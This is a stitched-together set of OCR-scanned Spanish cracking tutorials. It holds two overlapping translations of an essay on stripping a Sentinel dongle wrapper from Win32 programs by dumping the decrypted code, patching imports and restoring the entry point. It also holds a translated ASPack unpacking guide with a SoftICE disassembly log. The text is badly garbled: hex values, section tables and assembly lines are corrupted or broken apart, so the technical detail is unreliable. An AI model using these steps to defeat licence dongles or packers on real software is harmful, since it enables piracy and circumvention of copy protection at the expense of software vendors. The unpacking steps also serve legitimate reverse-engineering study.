02 .rdata 00000800 00020000 00000800 0001E600 C0000040 [IRW] 
03  .data 00013E24 00021000 0000D200 0001EE00 C0000040 [IRW] 


04  .PADOOO 00000E00 00035000 00000E00 00000000 C0000080 [URW] 
05  .SSINod 00007A00 00036000 00007A00 0002C000  E0000040 [IERW] 


06 .rsrc 00000800 0003E000 00000800  00033A00 C0000040 [IRW] 
07  .idata 00000Cc00  0003F000  00000C00. 00034200  CO0000040 [IRW] 
08 .reloc 00000200 00040000 00000200  00034E00 42000040 [IDR] 


El RVA del segmento .text es 1000, significa que en la memoria éste comieza en la dirección 401000 (image base + 
1000). El "Phys off" es donde está alojado el segmento .text en el archivo ejecutable. Esto significa que el dump 
desencriptado tiene COOh bytes entre las direcciones 400h y 1000h, que necesitan ser cortadas. 


El header (encabezado) del ejecutable no está encriptado, y en mis experiencias anteriores siempre resulta idéntico en 
la imagen de memoria. Con tu editor favorito corta los COOh bytes y pegále la imagen dumpeada encima del ejecutable. 


Reparando los imports 


Nosotros hicimos el volcado de los pares de direcciones para mover la dirección de importación entre los segmentos 
.reloc y .PADOOO al comienzo. Debemos tener mucho espacio para código en el segmento .SSINod, y una vez que el 
programa esté realmente crackeado, éste no debería pasar más dentro de este segmento. Cambié el volcado de binario 


a hexadecimal, después lo edité manualmente a sentencia de assembler por cualquier viejo ensamblador que pueda 
crear un archivo binario de salida. Agregué A1h adelante de la primera dirección para hacer un "mov eax[????]" y A3h 
adelante de la siguiente para hacer "mov [????], eax". Recordá agregar la dirección de carga de la Imagen (Image 
load) a todas las direcciones, porque son todas relativas. Acordáte que estás cargando del segmento .reloc y 
almacenando en el segmento .PADOOO. Yo solo volqué este fragmento binario en el ejecutable al comienzo del 
segmento .SSINod. Después de lo anterior bien podrías querer emparchar el RVA de entrada en el encabezado del 
ejecutable para apuntar a este código (o emparchar un salto más tarde). 


¿Dónde estamos ahora? 


En este punto deberíamos tener un ejecutable que ya no está encriptado y empezara corriendo un pedazo de código 
que mueve direcciones de importación en donde el ejecutable original espera que estén. El punto de entrada 
probablemente apunta a este código pero no corre, debido a que el emparchado de la importación actualmente apunta 
al código basura de la mochila. El ejecutable debe tener el mismo tamaño que el original, si no es así, me temo que se 
te perdió algo en la edición en algún lugar. Bien ahora tenés algo para comenzar a crackear el final del listado muerto. 
El trabajo que tenés que hacer es buscar el entry point original y emparchar adentro un salto al final del emparchado 
del código de importación antes de que puedas intentar correrlo. 


Si estás usando el IDA, puede ser que descubras el entry point como alguna de las funciones de startup de las 
bibliotecas de run time. Aunque el IDA no reconoce el compilador automáticamente en los ejecutables reconstruidos 
(selecccionar firma manualmente). La otra altenativa es debuguear otro programa construido con el mismo compilador 
para encontrar cómo luce el entry point. También podés observar el código para buscar un llamado a Call GetVersion, 
los códigos de startup casi siempre llaman al principio esta función. Una vez que encontraste esto y lo emparchaste, el 
trabajo está hecho. Ahora tenés el mismo ejecutable con las mismas funciones que tenía antes que fuera envuelto 
(wrapped). 


Hay chances de que este programa aún pueda hacer llamadas al código de la mochila, pero ya no es como el autor 
espera: que la examinación del código sea difícil y el emparchado imposible. Es poco probable que hagan algo muy 
sofisticado, y si lo hacen, mejor, más desafío para nosotros. 


Nota Final 


Bien, espero que hayas encontrado esto interesante y útil. No he visto este encriptado de Sentinel en otro lado que no 
sea el segmento .text, por supuesto no siempre se encripta el segmento de .text completo. La misma técnica de 
recuperación puede ser usada para otro esquema basado en encriptación, pero pensá en extender el truquito del 
encriptado a otros segmentos además del .text. Tendrás que volcar y capturar una imagen antes de que el programa 
corra lo suficiente como para que "fumigue" sus propios segmentos. El segmento .reloc es particularmente doloroso 
porque el OS lo "corrompe" durante la carga, (sin embargo este tipo de cosas es igualmentente difícil para el 
protector). 


La protección HASP parece ser bastante parecida a mi Sentine. Yo sospecho que el encriptado de enrollado de Sentinel 
es mucho más robusto. 
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Este ensayo describe un metodo para trabajar alrededor de una proteccion bastante torpe para programas Win32 que utilizan 
dongles Sentinel. 


Protecciones Win 32 por Dongle SSI. 


Trabajo inicial alrededor de blancos Win32 dificiles 
Escrito por Spyder 


Introduccion 


Esto no es un crack completo de algo, solo un trabajo que hace posible un crack aparentemente imposible. Yo se poco acerca 
de dongles, o acerca de compañias que los fabriquen. Para este blanco la compañia se llama "Sentinel", y si usted ve 
referencias a Sentinel o SSI, entonces estamos hablado de la misma cosa. Si usted intenta un listado completo y encuentra 
megabytes de basura eso tambien es una buena (o mala?) señal. 


Se poco acerca del codigo real del dongle - nunca tuve que mirarlo - pero instalar breakpoints en la puerta 1/O de la impresora 
o algo asi, es la “*ultima* forma de iniciar un crack de cualquier programa protegido por dongles (aka dongled program) 
(IMHO). 


Herramientas requeridas 


Borland Turbo debuger. 

Borland Tdump es practico. 

Un buen editor de binario 

Un buen disasembler (puede usted decir IDA?). 


URL/FTP del blanco 


No hay un blanco especifico. 


Ensayo 


) 


Porque este crack tendria que ser imposible”. Bien, el codigo del dongle es una envoltura para un ejecutable semi-protegido. 
Cuando la envoltura se aplica, encripta la mayoria del codigo ejecutable, de hecho se coloca al final del programa y toma el 
punto de entrada del mismo. Cuando se hace correr el programa el codigo del dongle se hace con el control, y si esta contento 
con el dongle encontrado desencritpta el ejecutable y le transfiere el control. El ejecutable puede entonces llamar nuevamente 
al codigo del dongle para realizar cualquier chequeo especifico que quiera, para confirmar que el todavia esta presente, en 
varios momentos durante la ejecucion. 


Pero aun cuando rompa el codigo inicial del dongle usted necesitara entender y remendar el ejecutable principal. La encripcion 
hace la comprension dificil y el emparchado casi imposible. La ruptura completa del codigo del dongle es improbable que sea 
una opcion. Este tipo de dongles hacen cosas como devolver un valor de una cadena variable que se les pasa, el algoritmo y las 
llaves para hacer eso estan realmente asentados dentro del dongle - no hay ninguna manera facil de emparchar el codigo del 
driver del dongle para obtener el mismo resultado. 


No he mirado los detalles exactos de la encripcion principal, pero no es debil. Estoy bastante seguro que es una encripcion 
rotativa (encriptado por convolucion (N.d.T.)) donde cambiar un byte afecta a todos los siguientes, es por eso que emparcharla 
sea tan dificil. Tambien estoy bastante seguro que las llaves de encripcion salen del dongle (deben trabajar de esta forma si los 
proveedores del dongle tienen algo de sentido) de modo que usted necesitara el dongle por al menos un par de horas. Pero, 
usted tambien podria tener UN POCO DE SUERTE. "Crackear sin suerte es tan imposible como crackear sin sentimiento”. 


Si el programa tiene un Demo, o quizas algun tipo de opcion para obtener la licencia por la red, entonces debe ser 
desencriptado sin la presencia del dongle, asi usted puede correrlo y entoces decidir si realmente necesita el dongle o la licencia 
de la red o cualquier cosa para utilizarlo totalmente. Entonces, conociendo esto, como vamos a trabajar con el?. Mi 
aproximacion es deshacer lo que se hizo cuando la cubierta fue aplicada, re-creando algo cercano al programa original antes de 
que fuera cubierto, entonces se pueden usar tecnicas normales de "reversing" . Eche una mirada a estas interesantes partes del 
volcado de un programa de muestra:- 


Entry RVA 0003D950 

Image base 00400000 

Object table: 

++ Name VirtSize RVA PhysSize Phys off Flags 

01 text 0001£200 00001000 0001E200 00000400 E0000020 [CERW] 
02 rdata 00000800 00020000 00000800 0001E600 C0000040 [IRW] 
03 data 00013E24 00021000 0000D200 0001EE00 C0000040 [IRW] 
04  .PADOOO 00000E00 00035000 00000E00 00000000 C0000080 [URW] 
05  .SSINod 00007A00 00036000 00007A00 0002C000 E0000040 [IERW] 
06 .rsrc 00000800 0003E000 00000800 00033A00 C0000040 [IRW] 
07  .idata 00000C00 0003F000 00000C00 00034200 C0000040 [IRW] 
08 .reloc 00000200 00040000 00000200 00034E00 42000040 [IDR] 


SSINod es el codigo agregado del dongle, PADOOO es donde se encuentra el segmento .reloc (que contiene las direcciones de 
importacion utilizadas durante la carga del programa)del programa original. Image base es donde el modelo del programa 
queda cargado en una memoria plana (la mayoria de las direcciones son relativas a esta base). La entrada RVA es la direccion 


de inicio del programa. El proximo paso es obtener el programa cargado y desencriptado dentro del Turbo debuger. Si el 
programa corre y queda corriendo mientras presenta un mensaje de error entonces la mejor manera de operar es encender el 
TD32 en una ventana DOS y enlazarse al programa. Una de las maravillas del debuger Win32, simplemente cliquee sobre 
FilejAttach y seleccione una ventana, despues de lo cual TD32 obtendra el mando del programa y usted podra echar una mirada 
alrededor. 


Tambien se podria iniciar el programa con el TD32 pero obtener el control una vez corriendo y desencriptado no es tan facil. 
Incluso se puede confiar en la imagen de memoria cuando el programa ha terminado, o quizas mirar en el stack y encontrar 
lugares donde se pueden colocar breakpoints. Estoy seguro que es mucho mas facil con el SoftICE, pero SoftICE (hasta donde 
yo se) no puede hacer todo lo que hace T'D32. Sin embargo asumo que se maneja de algun modo para conseguir el mando del 
programa usando TD32. Heche una mirada a la RVA image base + .text para estar seguro que luce como codigo, para 
confirmar que el programa ha sido desencriptado, sino quizas necesite pedir prestado otro dongle a sus amigos y comenzar otra 
vez. 


Ahora abra una ventana de volcado, vaya (Ctrl+G) a la direccion de image base y comienze marcando un bloque mediante la 
retencion y arrastre del mouse sobre los bytes hexadecimales requeridos (el marcado de bloques en TD32 es un poco extraño y 
las teclas shift y cursor no siempre funcionan). Ahora vaya hasta el fin del segmento .text (hasta donde se debe extender el 
bloque marcado). Seleccione Block|Write (Ctrl+B, W) y amablemente TD32 descargara el header ejecutable y el segmento 
completo de texto desencriptado en un archivo para usted. TD32 parece escribir los bloques a aproximadamente 1-2KB por 
segundo, lo que es lo bastante lento como para que se pueda ir a tomar un cafe o un coctail (!). (Lamento si estoy siendo 
demasiado especifico acerca del "manejo" del TD32, pero la primera vez que hice esto, no comprendía que se pudieran 
descargar bloques de memoria al disco y gaste horas escribiendo el volcado de memoria en un archivo y luego escribi un 
programa propio para volver los datos a binario, por eso quiero asegurarme que mis lectores conozcan este truco - un pequeño 
conocimiento a veces va por un largo camino). 


Ahora una cosa mas antes de terminar con el TD32. Eche una mirada al segmento PADOOO. Sera principalmente ceros y vera 
un bloque de direcciones de 32 bits. Estas son las entradas de importacion que se agregan en el momento de la carga en el 
segmento .reloc y parte del codigo del dongle los copia aqui, donde el ejecutable principal espera que esten. El orden y numero 
de las entradas no es el mismo que en el segmento .reloc, entonces no se puede simplemente copiarlo, ni manosear las RVA's 
para colocarlos en el lugar correcto. Ponga un breakpoint de escritura en la memoria fisica en cualquier de estos sitios y 
reinicie el programa desde el T'D32 (Ctrl+F2). TD32 hara un break en medio del codigo del dongle, el que esta copiando estas 
entradas. Eche una mirada al codigo y - si esta como el material que yo he visto - podra encontrar una tabla de pares (parejas) 
de direcciones de 32 bits apuntada por EBX. Estos son pares de direcciones relativas (a la imagen) dentro de .reloc con la 
direcciones relativas requeridas en PADOOO para las mismas importaciones. Marque esta tabla y descarguela al disco como 
antes. 


Ahora henos terminados con el TD32 y - probablemente - con el dongle. 


Poniendo todo junto de nuevo 


Ahora tenemos que insertar la descarga desencriptada en el ejecutable, lo que es una clase de edicion binaria, pero bastante 
tramposa. Eche otra mirada a la tabla "tdump'ed” y trate de comprender que significa... 


Entry RVA 0003D950 

Image base 00400000 

Object table: 

+ Name VirtSize RVA PhysSize Phys off Flags 

01. .text 0001£E200 00001000 0001E200 00000400 E0000020 [CERW] 
02  .rdata 00000800 00020000 00000800 0001E600 C0000040 [IRW] 
03 ¿data 00013E24 00021000 0000D200 0001EE00 C0000040 [IRW] 
04  .PADO0OO 00000E00 00035000 00000E00 00000000 C0000080 [URW] 


05  .SSINod 00007A00 00036000 00007A00 0002C000 E00000%40 [IERW] 
06 .rsrc 00000800  0003E000 00000800 00033A00 C0000040 [IRW] 
07  .idata 00000Cc00  0003F000  00000C00 00034200  C0000040 [IRW] 
08  .reloc 00000200 00040000 00000200 00034E00 42000040 [IDR] 


La RVA del segmento .text es 1000 que en la memoria comienza en la image base + 1000 = 401000. El Phys off (Physical 
offset (N.d.T.)) es donde se encuentra .text en el archivo ejecutable. Esto significa que la descarga desencriptada tiene COO 
bytes entre 400 y 1000, que necesitan ser cortados. El header del archivo ejecutable no esta encriptado, y en mi experiencia 
siempre es identico en la imagen en memoria. Con su editor favorito, corte los COO bytes y "pegue" la imagen descargada 
encima del ejecutable. 


Arreglando las importaciones 


Tenemos la descarga de los pares de direcciones para mover las direcciones de importacion entre los segmentos .reloc y 
.PADOOO al inicio. Deberiamos tener suficiente espacio para el codigo en el segmento .SSINod dado que una vez que este 
realmente crackeado el programa no debe tener que llamar alli nunca. Yo transforme la descarga binaria en hexadecimal, luego 
lo edite manualmente como definiciones de bytes (db) para cualquier ensamblador antiguo que pueda crear un archivo binario 
como salida. Agregue un A1h delante de la primera direccion para formar "mov eax,[??7?]" y A3h en la siguiente para "mov 
[22??],eax". Recuerde sumar la direccion de Image base a todas las direcciones porque son relativas. Verifique dos veces que 
esta cargando de .reloc y guardando en .PADO0O. 


Yo simplemente volque este fragmento binario en el ejecutable al comienzo del segmento .SSINod. Entoces podria arreglar la 
RVA del punto de entrada en el header del ejecutable para apuntar a este codigo (o arregalr un salto luego). 


Donde estamos ahora? 


En este estado usted debe tener un ejecutable sin encriptar y que empieza ejecutando un trozo de codigo que mueve direcciones 
de importacion a donde el programa original las espera. El punto de entrada posiblemente apunte a este codigo, pero no lo 
ejecuta porque el parche de importacion esta seguido de la basura del dongle. El ejecutable debe ser del mismo tamaño del 
original - sino tengo miedo de que se haya embrollado en alguna parte de la edicion. Ahora tiene usted algo que puede 
comenzar a crackear, bueno para hacer listados, pero tendra que ubicar el punto original de entrada y arreglar dentro de el un 
salto al final del codigo emparchado de las importaciones antes de intentar ejecutarlo. 


Si esta usando IDA bien puede descubrir el punto de entrada como funcion standard de libreria aunque IDA no parece 
reconocer automaticamente al compilador en estos ejecutables recontruidos (seleccione firma manual). La otra alternativa es 
hacer un debugging a otro programa construido con las mismas herramientas para ver como es el codigo del punto de entrada. 
Podria buscar codigos que se vean parecidos, sin embargo el codigo de arranque probablemente llame a GetVersion muy 
pronto. Una vez que a encontrado y arreglado el punto de entrada original, el trabajo esta terminado. Usted tiene ahora un 
ejecutable con las mismasd funciones que el original antes de que fuera envuelto. 


Hay posibilidades de que el programa todavia llame al codigo del dongle pero como los autores esperan que la envoltura del 
dongle haga el analisis dificil y el parcheado imposible, es improblable que hayan hecho algo muy sofisticado, y si lo han 
hecho, eso nos satisface: mas desafios aun! 


Notas Finales 


Bien, espero que emcontraran esto interesante y quizas util. No he visto la encripcion de este dongle Sentinel en particular mas 
que en el segmento .text, de hecho, no siempre se encripta el segmento .text entero. La misma tecnica de recuperacion puede 


ser usada para otros esquemas basados en encripcion, pero las cosas se ponen mas dificiles cuando mas que el segmento .text 
este encriptado. Usted tendria que hacer un break y capturar una imagen del programa antes de que que corra lo bastante como 
para "manchar" su propio segmento de datos, el segmento .reloc es particularmente penoso dado que el OS lo "corrompe" 
durante la carga (sin embargo este tipo de material es igualmente dificil para los protectores). 


La proteccion HASP suena bastante similar a mi Sentinel. Sospecho que la encripcion rotativa de Sentinel es mas robusta. 
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Traducido por Frantic, en abril de 2000. f franticOhotmail.com 


Estoy seguro de que, a estas alturas, ya tenéis noticia de los programas empaquetados. 

Si no es así, va a ser un tema sobre el que merece la pena aprender porque cada vez 

más y más recientes aplicaciones están siendo empaquetadas. Este ensayo trata de modo 
específico de ASPack v1.08.03, pero puede ofrecer información sobre el desempaquetado 
de muchos otros empaquetadores que hay por ahí. No he probado mis métodos con otras 
versiones de ASPack, u otros empaquetadores, así que ¡puede que funcionen! 


Será muy conveniente imprimir este ensayo si vais a seguirlo paso a paso. Sería bastante 
difícil hacerlo si lo tuvierais que leer en pantalla. Tendréis algunos problemas de cortes 
de líneas, aunque esto no debería obstaculizar su comprensión. 


1. NuMega Soft-Ice (cualquier versión para Windows) 
2. ProcDump de uCF 
3. ASPack v1.08.03 


Un poco acerca de programas empaquetados: Los autores de Software empaquetan 

sus programas fundamentalmente por dos razones. Primero, un empaquetador reduce 
considerablemente el tamaño de los archivos del programa, ahorrando espacio en el 

disco duro. En segundo lugar, los empaquetadores pueden complicar el trabajo de un 
reverser, ya que no se puede obtener un desensamblado exacto del archivo. 

El programa original está "envuelto" dentro del código del empaquetador, el cual 

esconde el código original. Cuando se ejecuta el programa, en realidad, se está ejecutando 
en primer lugar el código del empaquetador. El empaquetador, por su parte, desempaqueta 
la aplicación original en memoria, de modo que pueda ejecutarse. 

Aquí es donde detendremos la ejecución del programa - el punto donde nuestro 

programa es desempaquetado en memoria. Entonces podemos "volcar" el programa a disco, 
y tras una leve modificación del encabezamiento PE (que no se trata con gran detalle 

en este ensayo), ¡tendremos una copia del programa original desempaquetado! 


En lugar de buscar por ahí un programa que haya sido empaquetado con ASPack v1.08.03, 


podemos simplificar las cosas empaquetando ¡nuestro propio programa! Voy a elegir uno 
con el cual estáis familiarizados: la Calculadora de Windows 95/98 (calc.exe). 


Lo primero que tenemos que hacer es empaquetar el programa (¡aseguraos de que sea una 
copia de calc.exe, no el original!). Abrir calc.exe con ASPack, y comenzará a 
empaquetar el programa. Una vez terminado, podéis probarlo ("Test It”) sí queréis; 

luego salir de ASPack. 


Ahora que nuestro programa está empaquetado, carguémoslo en el Symbol Loader de 
Soft-Ice (File, Open Module). Ahora ejecutémoslo (Module, Load). ¡¡Soft-Ice no salta!! 
¿Por qué? He aquí una breve explicación del excelente ensayo de Miz: 


Ehhhh...El cargador de Slce no se detiene en el punto de entrada como queríamos. 
Hmmmm...¿Por qué será? 


¡La respuesta la tenemos en el formato PE! (Ya os dije que era un tema importante) 
Echemos un vistazo con ProcDump, por medio de la opción 'PE Editor": - 
Lo primero que detectamos es que el punto de entrada del empaquetador (PEP) es 0x00006046. 


Miremos en la sección en que se halla el PEP:- 
Bien, vemos que es la sección ".text", y las características son 0xC0000040 


¿Qué significa esto? Bien, echemos un vistazo a winnt.h para ver... 


[Extracto de WinNT.h] 

// Section characteristics. (Características de sección) 

ttdefine IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved. (Reservada) 

ttdefine IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code. (Sección conteniendo código) 
ttdefine IMAGE_SCN_CNT_INITIALIZED_ DATA 0x00000040 // Section contains initialized data. 
(Sección conteniendo datos inicializados) 

ttdefine IMAGE_SCN_CNT_UNINITIALIZED_ DATA 0x00000080 // Section contains uninitialized data. 
(Sección conteniendo datos no inicializados) 

ttdefine IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved. (Reservada) 

+tdefine IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information. 
(Sección conteniendo comentarios o algún otro tipo de información) 

ttdefine IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image. 
(Los contenidos de la sección no serán parte de la imagen) 

ttdefine IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat. 

(Sección conteniendo comdat) 

ttdefine IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section. 
(Resetear excepciones especulativas manejando bits en entradas TLB para esta sección) 
ttdefine IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP 

(Se puede acceder al contenido de la sección relativo a GP) 

ttdefine IMAGE_SCN_MEM_FARDATA 0x00008000 

ttdefine IMAGE_SCN_MEM_PURGEABLE 0x00020000 

ttdefine IMAGE_SCN_MEM_16BIT 0x00020000 

ttdefine IMAGE_SCN_MEM_LOCKED 0x00040000 

ttdefine IMAGE_SCN_MEM_PRELOAD 0x00080000 

ttdefine IMAGE_SCN_ALIGN_1BYTES 0x00100000 // 

ttdefine IMAGE_SCN_ALIGN_2BYTES 0x00200000 // 

ttdefine IMAGE_SCN_ALIGN_4BYTES 0x00300000 // 

ttdefine IMAGE_SCN_ALIGN_8BYTES 0x00400000 // 

+tdefine IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified. 
(Alineación predeterminada si no se especifican otras) 

ttdefine IMAGE_SCN_ALIGN_32BYTES 0x00600000 // 

ttdefine IMAGE_SCN_ALIGN_64BYTES 0x00700000 // 

ttdefine IMAGE_SCN_ALIGN_128BYTES 0x00800000 // 

ttdefine IMAGE_SCN_ALIGN_256BYTES 0x00900000 // 


ttdefine IMAGE_SCN_ALIGN_512BYTES 0x00A00000 // 
ttdefine IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 // 
ttdefine IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 // 
ttdefine IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 // 
ttdefine IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 // 
ttdefine IMAGE_SCN_LNK_NRELOC_OVEL 0x01000000 // Section contains extended relocations. 
(Sección conteniendo relocalizaciones extendidas) 
ttdefine IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded. 
(Sección descartable) 

ttdefine IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable. 
(Sección no cacheable) 
ttdefine IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable. 
(Sección no paginable) 
ttdefine IMAGE_SCN_MEM_SHARED 0x 10000000 // Section is shareable. 
(Sección compartible) 
ttdefine IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable. 
(Sección ejecutable) 
ttdefine IMAGE_SCN_MEM_READ 0x40000000 // Section is readable. 

(La sección se puede leer) 
ttdefine IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable. 

(La sección se puede escribir) 


De aquí podemos ver que nuestra 0xC0000040 realmente significa:- 


0xC0000040 = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_INITIALIZED_DATA 
NANANANAAMAAAAAAAAAAMA ANÑANÑANANANAÑNANAMAMRA ANANAANANANANANANAANANANANAAAAA 

Read Write Initialized Data 

(Datos inicializados, de lectura, de escritura) 


Hmmm - pero sabemos que el cargador de Slce no saltará en la entrada salvo que indiquemos 
que esta sección contiene “CODIGO*; también deberíamos indicar que es ejecutable. 


Así que (con ProcDump) cambiamos las "Section Characteristics" de la sección .text a OxE0000020. 


0xE0000020 = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_CODE 
AANAANAAAAAMAAAAAAAAMA NANÑANANAANAÑNAMAMAMA ANANANANAÑNANANANAAÑA NANÑANANAÑNANANAMAMA 

Executable Read Write Contains Code 

(Ejecutable, de Lectura, de Escritura, Conteniendo Código) 

¿Salta el cargador del SIce ahora? ¡Ya lo creo! 


Si no entendéis completamente esto, no os preocupéis. Podéis leer más 

información de los PE posteriormente. Lo que necesitamos saber de esta información es cómo 
hacer que salte el Soft-Ice a través del Symbol Loader. Para ello, se ejecutan los 

pasos siguientes: 


1. Ejecutar ProcDump y hacer click en el botón "PE Editor". 

2. Seleccionar el archivo calc.exe empaquetado. 

3. Hacer click en el botón "Sections". 

4. Hacer click con el botón secundario del ratón en la primera línea (.text) 
y seleccionar "Edit Section". 

5. Cambiar las "Section Characteristics" de CODOOO40 a E0000020. 

6. Pulsar "OK", y salir de Procdump. 


Habiendo completado estos pasos, abrir y cargar el programa en el Symbol Loader de nuevo. 
¡Esta vez salta Soft-Ice! 


Ahora estamos en el código del empaquetador. La clave para llegar al final de este código, 
lugar necesario para desempaquetar el programa original, es colocar diversos BPX para 
atravesar los bucles. Si intentáis hacerlo manualmente, sin colocar breakpoints, eso podría 
suponer horas (o días. Nunca lo he intentado). 


Debajo está todo el código del archivo log de mi Symbol Loader. He comentado dónde poner 
los breakpoints y las líneas inportantes. Mis comentarios van precedidos de "***". 


NOTA: Los números de las direcciones pueden ser diferentes en vuestro PC, pero los tres últimos 
serán iguales (XXX:XXXXX712). 


015F:01017000 PUSHAD 

015F:01017001 CALL 01017006 

015F:01017006 POP. EBP 

015F:01017007 SUB  EBP,00444A0A 

015F:0101700D MOV EBX,00444A04 

015F:01017012 ADD EBX,EBP 

015F:01017014 SUB  EBX,[EBP+004450B1] 
015F:0101701A CMP.— DWORD PTR [EBP+004450AC],00 
015F:01017021 MOV [EBP+00444EBB],EBX 
015F:01017027 JNZ 01017544 
015F:0101702D LEA  EAX,[EBP+004450D1] 
015F:01017033 PUSH EAX 

015F:01017034 CALL [EBP+00445194] 
015F:0101703A MOV  [EBP+004450CD],EAX 
015F:01017040 MOV— EDLEAX 
015F:01017042 LEA  EBX,[EBP+004450DE] 
015F:01017048 PUSH EBX 

015F:01017049 PUSH EAX 


(NO JUMP) 


015F:0101704A CALL 


015F:01017050 MOV 


[EBP+00445190] 
[EBP+004450B9],EAX 


015F:01017056 LEA  EBX,[EBP+004450EB] 


015F:0101705C PUSH 
015F:0101705D PUSH 
015F:0101705E CALL 
015F:01017064 MOV 
015F:0101706A MOV 
015F:01017070 MOV 
015F:01017076 PUSH 
015F:01017078 PUSH 
015F:0101707D PUSH 
015F:01017082 PUSH 
015F:01017084 CALL 
015F:0101708A MOV 


EBX 
EDI 

[EBP+00445190] 
[EBP+004450BD],EAX 
EAX,[EBP+00444EBB] 
[EBP+004450AC],EAX 
04 
00001000 

0000049A 
00 

[EBP+004450B9] 
[EBP+004450B5],EAX 


015F:010170900 LEA  EBX,[EBP+00444ACHF] 


015F:01017096 PUSH 
015F:01017097 PUSH 
015F:01017098 CALL 
015F:0101709D MOV 


EAX 

EBX 
01017565 
ECX,EAX 


015F:0101709F LEA EDI [EBP+00444ACF] 


015F:010170A5 MOV 
015F:010170AB SAR 


ESL[EBP+004450B5] 
ECX,02 


015F:010170AE REPZ MOVSD 


015F:010170B0 MOV 
015F:010170B2 AND 


ECX,EAX 
ECX,03 


015F:010170B5 REPZ MOVSB 


015F:010170B7 MOV 


EAX,[EBP+004450B5] 


015F:010170BD PUSH 00008000 


015F:010170C2 PUSH 
015F:010170C4 PUSH 


015F:010170C5 CALL 


015F:010170CB LEA 


00 

EAX 
[EBP+004450BD] 

EAX,[EBP+00444C37] 


015F:010170D1 PUSH EAX 


015F:010170D2 RET 


015F:01017233 MOV 
015F:01017239 OR 
015F:0101723B JZ 
015F:01017247 LEA 
015F:0101724D CMP 
015F:01017250 JZ 
015F:01017256 LEA 
015F:0101725C PUSH 


015F:0101725D CALL 


015F:01017263 MOV 
015F:01017269 MOV 
015F:0101726B LEA 

015F:01017271 PUSH 
015F:01017272 PUSH 
015F:01017273 CALL 
015F:01017279 MOV 
015F:0101727F LEA 

015F:01017285 PUSH 
015F:01017286 PUSH 
015F:01017287 CALL 
015F:0101728D MOV 
015F:01017293 LEA 

015F:01017299 MOV 

015F:0101729C PUSH 
015F:0101729E PUSH 
015F:010172A3 PUSH 
015F:010172A4 PUSH 
015F:010172A6 CALL 
015F:010172AC MOV 
015F:010172B2 PUSH 
015F:010172B3 MOV 
015F:010172B5 ADD 


01017365 


EBX [EBP+00444ADF] 


EBX,EBX 
01017247 


(JUMP ) 
ESL[EBP+00444AF7] 
DWORD PTR [ESI],00 
(NO JUMP) 
EAX.[EBP+004450D1] 
EAX 
[EBP+00445194] 
[EBP+004450CD],EAX 
EDLEAX 
EBX,[EBP+004450DE] 
EBX 
EAX 
[EBP+00445190] 
[EBP+004450B9],EAX 
EBX,[EBP+004450EB] 
EBX 
EDI 
[EBP+00445190] 
[EBP+004450BD],EAX 
ESL[EBP+00444AF7] 
EAX,[ESI+04] 
04 
00001000 
EAX 
00 
[EBP+004450B9] 
[EBP+004450B5],EAX 
ESI 
EBX.[ESI] 
EBX [EBP+004450AC] 


015F:010172BB PUSH EAX 

015F:010172BC PUSH EBX 

015F:010172BD CALL 01017565 

015F:010172C2 CMP.-  EAX,[ESI+04] 

015F:010172C5 JZ  010172D2 (JUMP >) 
015F:010172D2 CMP.— BYTE PTR [EBP+004450B0],00 


015F:010172D9 JINZ 01017316 


015F:010172DB INC 

015F:010172E1 PUSH 
015F:010172E2 PUSH 
015F:010172E3 PUSH 
015F:010172E4 PUSH 
015F:010172E535 MOV 
015F:010172E7 SUB 

015F:010172EA MOV 


(NO JUMP) 
BYTE PTR [EBP+004450B0] 

EAX 

ECX 

ESI 

EBX 

ECX,.EAX 
ECX,06 

ESI, [EBP+004450B5] 


015F:010172F0 XOR  EBX,EBX 
015F:010172F2 OR ECX,ECX 


015F:010172F4 JZ 01017312 (NO JUMP) 
015F:010172F6 JS 01017312 (NO JUMP) 
015F:010172F8 LODSB 

015F:010172F9 CMP  AL,ES 

015F:010172FB JZ 01017305 (NO JUMP) 
015F:010172FD CMP.-  AL,E9 

015F:010172FF JZ 01017305 (NO JUMP) 
015F:01017301 INC” EBX 

015F:01017302 DEC.” ECX 

015F:01017303 JMP. 010172F2 (JUMP >) 
015F:010172F2 OR ECX,ECX 

015F:010172F4 JZ 01017312 (NO JUMP) 
015F:010172F6 JS 01017312 (NO JUMP) 


015F:010172F8 LODSB 


015F:010172F9 CMP  AL,ES 


*** Poner un BPX aquí para saltar a la línea siguiente (BPX 015F:01017312) 
Pulsar ES 


Break due to BPX +015F:01017312 (ET=8.40 milliseconds) 
015F:01017312 POP.” EBX 

015F:01017313 POP  ESI 

015F:01017314 POP. ECX 

015F:01017315 POP. EAX 

015F:01017316 MOV  ECX,EAX 
015F:01017318 MOV EDL|[ESI] 
015F:0101731A ADD EDI [EBP+004450AC] 
015F:01017320 MOV  ESI [EBP+004450B5] 
015F:01017326 SAR  ECX,02 
015F:01017329 REPZ MOVSD 
015F:0101732B MOV  ECX,EAX 
015F:0101732D AND  ECX,03 
015F:01017330 REPZ MOVSB 

015F:01017332 POP  ESI 

015F:01017333 MOV  EAX,[EBP+004450B5] 
015F:01017339 PUSH 00008000 
015F:0101733E PUSH 00 

015F:01017340 PUSH FEAX 

015F:01017341 CALL  [EBP+004450BD] 
015F:01017347 ADD ESLO8 
015F:0101734A CMP.— DWORD PTR [ESI],00 
015F:0101734D JNZ 01017299 (JUMP ) 


